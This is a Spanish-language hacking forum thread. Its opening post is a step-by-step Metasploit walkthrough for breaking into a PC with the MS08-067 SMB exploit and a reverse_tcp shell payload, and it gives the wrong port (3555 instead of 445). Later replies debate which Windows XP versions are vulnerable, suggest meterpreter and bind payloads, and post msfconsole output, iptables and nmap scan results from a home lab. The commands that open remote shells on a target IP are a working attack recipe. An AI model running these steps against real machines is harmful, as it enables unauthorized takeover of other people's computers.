send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metasploit | Penetrar una pc. [Exploit]

  • 22 Respuestas
  • 15397 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
  • Teenager enclosed codes.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« en: Febrero 17, 2015, 06:06:43 pm »

Metasploit | Penetrar una pc.

En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: You are not allowed to view links. Register or Login

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citar
use exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citar
set RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citar
set payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citar
set LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citar
exploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 64
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 25, 2015, 07:27:27 pm »
El viejo método del payload, jaja que recuerdos. Buen aporte 8)

Saludos.

Desconectado 0v3r_c0d3

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Agosto 26, 2015, 11:50:18 pm »
Gracias  :) añado que no es detectable por el antivirus pero si esta el firewall activo no puede funcionar, habría que usar otro método.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 206
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #3 en: Agosto 27, 2015, 12:03:55 am »
Citar
Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

El puerto 445.
Web: You are not allowed to view links. Register or Login

Twitter: You are not allowed to view links. Register or Login

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #4 en: Agosto 28, 2015, 06:25:20 am »
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #5 en: Agosto 28, 2015, 08:57:41 am »
You are not allowed to view links. Register or Login
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (You are not allowed to view links. Register or Login) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2). Aclarados estos fallos procederé a contestar a tu segunda inquietud. Cualquier auditor de seguridad lloraría hay muchísimos software que por contrato con la empresa obligan a tener el Windows XP en un service pack desactualizado, en caso contrario no ofertarían su soporte por consiguiente son un buen blanco.
Si tienes más dudas te recomiendo que mires estadísticas!
Salu2
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #6 en: Agosto 28, 2015, 09:41:04 am »
You are not allowed to view links. Register or Login
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (You are not allowed to view links. Register or Login) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #7 en: Agosto 28, 2015, 10:37:17 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (You are not allowed to view links. Register or Login) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:

(You are not allowed to view links. Register or Login). Le recomendaría leer algún tutorial donde expliquen como instalar una máquina virtual en un entorno controlado.
Saludos!
« Última modificación: Agosto 28, 2015, 10:40:14 am por MagoAstral »
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #8 en: Agosto 28, 2015, 11:02:18 am »
You are not allowed to view links. Register or Login
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
« Última modificación: Agosto 28, 2015, 11:06:46 am por rand0m »
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #9 en: Agosto 28, 2015, 11:35:17 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
1º You are not allowed to view links. Register or Login Una prueba de concepto o PoC (por sus siglas en inglés) es una implementación, a menudo resumida o incompleta, de un método o de una idea
2º Acabo de montar un windows xp sp3, desactivado el firewall y explotado correctamente la vulnerabilidad. ¿Magia? Claro no recordaba que era un Mago...
3º Lo primero es que no voy a seguir discutiendo con un necio como es usted, que carece de argumentos y recurre al insulto. Ya no me gustaba esos aires de superioridad, de mirar por encima del hombro y criticar el trabajo de los demás con el tema de los vídeos pero decidí no intervenir. Como asumo que no eras el más rápido de tu clase en comprensión lectora te aclararé, cuando me refería a que mirases un tutorial es porque alomejor estás cometiendo alguna errata en tu laboratorio y ahí subyace el problema de que no puedas realizar tus pruebas de concepto, demostraciones, etc... como quieras llamarlo.
Te dejo unas capturas:
(You are not allowed to view links. Register or Login)
(You are not allowed to view links. Register or Login)
Saludos compañero!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #10 en: Agosto 28, 2015, 04:44:13 pm »
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX


Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #11 en: Agosto 28, 2015, 05:08:23 pm »
Bueno, visto lo visto he creado una máquina virtual nueva y le he instalado Windows XP SP3, desactivando las actualizaciones automáticas durante la instalación. Los únicos clicks que se hicieron en esta nueva máquina fueron para acceder al Panel de Control y desactivar el firewall.
Al lanzar el exploit no obtenemos un resultado satisfactorio, por eso compruebo la conectividad de la siguiente manera:
  • Hago ping a la máquina WinXPSP3 y ésta responde correctamente (192.168.1.17)
  • Pongo el puerto 4444 a la escucha con netcat y, desde Windows, accedo con Internet Explorer a 192.168.1.15:4444
Ambas pruebas funcionan, por lo que sabemos que la máquina con Kali se comunica correctamente con la máquina Windows y viceversa. Además, por si acaso, me aseguré de que Windows puede realizar conexiones salientes al puerto 4444.
¿Qué ocurre, entonces? Que las instalaciones difieren. Mientras mi disco de Windows instala un sistema parcheado el que utilizó para el ejemplo MagoAstral no instaló tal parche.
Y de ahí que ambos tuviéramos razón: Windows XP SP3 puede ser vulnerable tras la instalación si lo instalamos desde una versión sin parchear. De todas formas los usuarios no suelen desactivar las actualizaciones automáticas, así que si ya es poco probable encontrarnos frente a un WinXP (Sin soporte por parte de M$), menos probable aún será que sea vulnerable a este exploit.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 206
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #12 en: Agosto 28, 2015, 05:16:14 pm »
@You are not allowed to view links. Register or Login al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.

Adjunto: You are not allowed to view links. Register or Login
« Última modificación: Agosto 28, 2015, 05:25:16 pm por q3rv0 »
Web: You are not allowed to view links. Register or Login

Twitter: You are not allowed to view links. Register or Login

Conectado Gabriela

  • *
  • Co Admin
  • Mensajes: 816
  • Actividad:
    5%
  • Reputación 12
    • Ver Perfil
    • Email
« Respuesta #13 en: Agosto 28, 2015, 05:38:25 pm »
You are not allowed to view links. Register or Login
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX

Foro, según la tercera acepción de la RAE:

Citar
3. m. Reunión para discutir asuntos de interés actual ante un auditorio que a veces interviene en la discusión.

Precisamente, este tipo de intercambio es lo que dinamizan, enriquecen y permiten aprender. No dejéis de hacerlo, siempre guardando las formas (como dijo ANTRAX) que  -todos- son aportes sumamente interesantes.

Gabi.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #14 en: Agosto 28, 2015, 06:09:29 pm »
You are not allowed to view links. Register or Login
@You are not allowed to view links. Register or Login al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.
En el primer intento que hice fue el que intenté utilizar. Acabo de usarlo contra la máquina nueva y sigue sin dar resultado.

Código: You are not allowed to view links. Register or Login
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.17     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.14     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
Partiendo de aquí hacemos cuantos intentos queramos, que el resultado es el mismo.
Código: You are not allowed to view links. Register or Login
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.14
LHOST => 192.168.1.14
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
No sé si es que estoy haciendo algo mal (A lo que agradecería que alguien arrojase algo de luz) o es que realmente el Windows no es vulnerable, como venía diciendo desde el principio.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #15 en: Agosto 29, 2015, 06:58:46 am »
Me respondo a mí mismo para plantear una respuesta:
Citar
Otra hipótesis es que tengas configuradas una políticas de iptables en tu kali de manera que no permite la conexión porque cuando sale el attempting to trigger the vulnerability indica que el meterpreter se ejecuta pero lanza un time out. Puedes probar a cambiar el payload por un bind_tcp.
Otro problema como tu dices sería la red normalmente la gente tiene problema al dejarlo en NAT pero como mencionaste anteriormente la tienes en adaptador puente ¿Has seleccionado replicar el estado?
De primeras el estado de la tarjeta no estaba replicado. Marqué la casilla en la configuración de VMware y arranqué de nuevo. Bien, empezando por las iptables, éstas están desactivadas.
Código: You are not allowed to view links. Register or Login
root@KaliSana:/home/rand0m# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
He probado a pasarle un scan de vulnerabilidades con nmap y éste es el resultado.
Código: You are not allowed to view links. Register or Login
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms x-c77d82deb3b94.home (192.168.1.17)
Y como llevo intentando desde ayer el exploit sigue sin funcionar.
Sigo afirmando, convencido a un 90%, que mi CD de instalación instaló un Windows XP SP3 parcheado.
Aunque tampoco os calléis. ¡El debate está abierto y más vivo que nunca!
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #16 en: Agosto 29, 2015, 10:41:07 am »
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED podría ser que estuvieran cacheadas las credenciales o algún otro problema de la misma índole pero lo que me extraña es que no comprueba la integridad de exploit ms08_067. Prueba a ejecutar un "check" y veamos que información te devuelve!
Otra cosa es que si podrías pasar el checksum SHA1 de tu ISO a ver si podemos acortar las rutas de solución ;)
Saludos
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #17 en: Agosto 29, 2015, 11:13:48 am »
You are not allowed to view links. Register or Login
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED
Hagamos hincapié en que está recién instalado, con todos los valores por defecto excepto el cortafuegos.
Los checks de metasploit dicen que el objetivo no es vulnerable.
Al pie de foto está el SHA1 de la imagen ISO.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #18 en: Agosto 29, 2015, 11:52:24 am »
Es que tu has descargado una versión de 2013, tienes que descargarte una iso original no una que haya sido alterada.
Prueba con esta: You are not allowed to view links. Register or Login
Saludos!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 215
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #19 en: Agosto 29, 2015, 12:00:11 pm »
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Insisto: Este exploit tuvo su época de oro, pero fue hace más de 5 años. Aún así estoy descargando la ISO que dices y voy a buscar (Si no es ésta), la última versión OEM de Windows XP.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1353
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 18316
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1625
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

Respuestas: 2
Vistas: 2313
Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet
Dump skype account our victim for Metasploit

Iniciado por BrowserNet

Respuestas: 0
Vistas: 1685
Último mensaje Mayo 21, 2016, 08:10:13 pm
por BrowserNet